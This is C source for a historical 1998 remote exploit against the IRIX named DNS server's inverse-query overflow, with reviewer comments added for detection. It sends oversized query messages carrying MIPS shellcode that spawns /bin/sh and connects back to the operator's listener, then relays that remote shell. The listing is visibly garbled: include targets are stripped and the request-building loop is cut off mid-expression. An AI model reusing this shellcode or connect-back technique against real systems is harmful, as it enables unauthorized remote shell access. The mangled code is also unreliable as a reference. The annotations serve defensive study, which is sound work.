/* Copyright (c) May 1998 Last Stage of Delirium */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF[2000]*/ /* Last Stage of Delirium [2000]*/ /* [2000]*/ /* The contents of this file may be disclosed to third */ /* parties, copied and duplicated in any form, in whole */ /* or in part, without the prior written consent of LsD. */ /* SGI named remote overflow exploit [2000]*/ /* tested on IRIX 5.3 and 6.2 including multiprocessor and */ /* multicache machines [2000]*/ /* won't work on IRIX64 6.2 since its named binary seems to */ /* be not vulnerable to the iquery overflow [2000]*/ /* usage ./r local_adr local_port target [2000]*/ /* you must specify the local_adr and local_port since[2000]*/ /* the remote shell is a connecting shell not a classic */ /* bind shell (it connects with the local machine) [2000]*/ /* NOTE(review): historical (1998) exploit listing for a buffer overflow in the inverse-query (iquery) handling of IRIX named, kept as extracted: the #include targets below were stripped, the preprocessor lines have been run together, and the loop in main that builds the request has lost its body, so this text does not compile as shown. What the surviving code visibly does, for detection purposes: it opens two TCP connections to the target, each carrying a DNS-style message with an oversized payload (25-byte header plus 930, then plus 10000 bytes), then waits on local_adr:local_port for the compromised name server to connect back and relays the operator's stdin/stdout to that shell. An outbound TCP connection originating from the name-server process to an arbitrary host/port is therefore the observable sign of success. */ #include #include #include #include #include #include #include #include /* START_ADR: address the payload is assumed to be reachable at on the target; every pointer written into the request is an offset from it */ #define START_ADR 0x10040100 /* big-endian store helpers: full 32-bit word, high 16 bits, low 16 bits; both macro arguments are evaluated more than once */ #define PUTADR(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;*(p+2)=(adr>>8)&0xff;*(p+3)=adr&0xff;} #define PUTADRH(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;} #define PUTADRL(p,adr) {*p=(adr>>8)&0xff;*(p+1)=adr&0xff;} /* 25-byte message header: bytes 0-1 are the DNS-over-TCP length prefix and bytes 23-24 the payload length (both filled in by main); the flag byte 0x09 at offset 4 encodes DNS opcode 1, inverse query, i.e. the code path the file header names as vulnerable */ char tablica[25]={ 0x00,0x00,0x34,0x34,0x09,0x80,0x00,0x00, 0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x01,0x20,0x20,0x20,0x20,0x00,0x00}; /* MIPS (IRIX) connect-back payload; main patches START_ADR-relative pointers and the connect-back address/port into it before sending, and the embedded "/bin/sh" string identifies it on the wire */ char asmcode[]={ 0x24,0x04,0x00,0x02,0x24,0x05,0x00,0x02,0x24,0x06,0x00,0x00,0x24,0x02,0x04,0x53, 0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x40,0x80,0x25,0x00,0x40,0x20,0x25, 
0x3c,0x05,0x10,0x04,0x34,0xa5,0xff,0xff,0x24,0x06,0x00,0x10,0x24,0x02,0x04,0x43,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x01,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x02,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x3c,0x04,0x10,0x01,0x34,0x84,0xff,0xf1,0x3c,0x05,0x10,0x02,0x34,0xa5,0xff,0xf2,0x24,0x02,0x03,0xf3,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00, '/','b','i','n','/','s','h',0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; /* entry point (pre-C99 implicit int): argv[1]/argv[2] are the address and port this tool listens on for the connect-back shell, argv[3] is the target */ main(int argc,char **argv) { int sck,i,srvsck; fd_set readfs; struct sockaddr_in address; struct sockaddr_in local; struct hostent *hp; int size; unsigned long lregt9,lreggp,lstart,lbcop7,ltmp; char regt9[4],reggp[4],start[4],bcop7[4]; char *b,*p; printf("IRIX named remote exploit\n"); printf("Last Stage of Delirium, May 1998, Poland\n\n"); if(argc!=4) { printf("usage: %s local_adr local_port target\n",argv[0]); exit(1); } /* listener for the connect-back: bound to local_adr:local_port here, listen()/accept() happen after the payload is sent; the socket() result is not checked */ srvsck=socket(AF_INET,SOCK_STREAM,0); bzero(&local,sizeof(local)); local.sin_family=AF_INET; local.sin_port=htons(atoi(argv[2])); if((local.sin_addr.s_addr=inet_addr(argv[1]))==-1) { if((hp=gethostbyname(argv[1]))==NULL) { printf("error: address.\n"); exit(-1); } memcpy(&local.sin_addr.s_addr,hp->h_addr,4); } if (bind(srvsck,(struct sockaddr *)&local,sizeof(local))<0) { perror("error"); exit(-1); } /* pointer values derived from START_ADR; their consumers were in the request-building loop that the extraction lost */ lbcop7=lregt9=START_ADR; lstart=START_ADR+0x14; lreggp=START_ADR+0x8024; PUTADR(regt9,lregt9); PUTADR(reggp,lreggp); PUTADR(start,lstart); PUTADR(bcop7,lbcop7); /* patch START_ADR-relative pointers into the payload */ ltmp=START_ADR+0xd8; PUTADRH(&asmcode[0x34-20+2],ltmp); PUTADRL(&asmcode[0x38-20+2],ltmp); ltmp=START_ADR+0xc8; 
PUTADRH(&asmcode[0xa8-20+2+4],ltmp); PUTADRL(&asmcode[0xac-20+2+4],ltmp); PUTADR(&asmcode[0xcc-20+4],ltmp); ltmp=START_ADR+0xd0; PUTADRH(&asmcode[0xb0-20+2+4],ltmp); PUTADRL(&asmcode[0xb4-20+2+4],ltmp); /* connect-back destination for the payload: the address/port this tool bound above */ ltmp=local.sin_addr.s_addr; PUTADR(&asmcode[0xdc-20],ltmp); ltmp=local.sin_port; PUTADRL(&asmcode[0xda-20],ltmp); /* first message: 930-byte payload; the length goes into both the TCP length prefix (bytes 0-1) and bytes 23-24 */ size=930; tablica[0]=(size+23)>>8; tablica[1]=(size+23)&0xff; tablica[23]=size>>8; tablica[24]=size&0xff; if((b=(char*)malloc(10500))==NULL) return(-1); memset(b,0,10500); bcopy(tablica,b,sizeof(tablica)); /* EXTRACTION DAMAGE: the loop body that fills the request buffer and the resolution of argv[3] into `address` were lost here; the text resumes mid-expression */ for(i=0;ih_addr,4); } if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0) { perror("error"); exit(-1); } fflush(stdout); /* short or failed writes are not handled */ write(sck,b,25+size); close(sck); /* second, larger message on a fresh connection; same buffer, only the length fields change (25+10000 fits the 10500-byte allocation) */ size=10000; b[0]=(size+23)>>8; b[1]=(size+23)&0xff; b[23]=size>>8; b[24]=size&0xff; sck=socket(AF_INET,SOCK_STREAM,0); sleep(1); if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0) { perror("error"); exit(-1); } fflush(stdout); write(sck,b,25+size); close(sck); /* wait for the connect-back; `i` is passed as the address length but holds the leftover loop counter rather than sizeof(local), and the listening descriptor is overwritten by the accepted one */ listen(srvsck,5); srvsck=accept(srvsck,(struct sockaddr*)&local,&i); printf("%s successfully exploited\n",argv[3]); fflush(stdout); /* relay loop: forwards stdin to the remote shell and the shell's output to stdout; "koniec." (Polish for "end.") is printed when either side closes; the EWOULDBLOCK/EAGAIN checks are moot since neither descriptor is set non-blocking */ while(1) { FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(srvsck,&readfs); if(select(FD_SETSIZE,&readfs,NULL,NULL,NULL)) { int cnt; char buf[1024]; if(FD_ISSET(0,&readfs)) { if((cnt=read(0,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else { printf("koniec.\n"); exit(-1); } } write(srvsck,buf,cnt); } if(FD_ISSET(srvsck,&readfs)) { if((cnt=read(srvsck,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else { printf("koniec.\n"); exit(-1); } } write(1,buf,cnt); } } } /* unreachable: the relay loop only leaves via exit() */ free(b); close(srvsck); } /* www.hack.co.za [2000]*/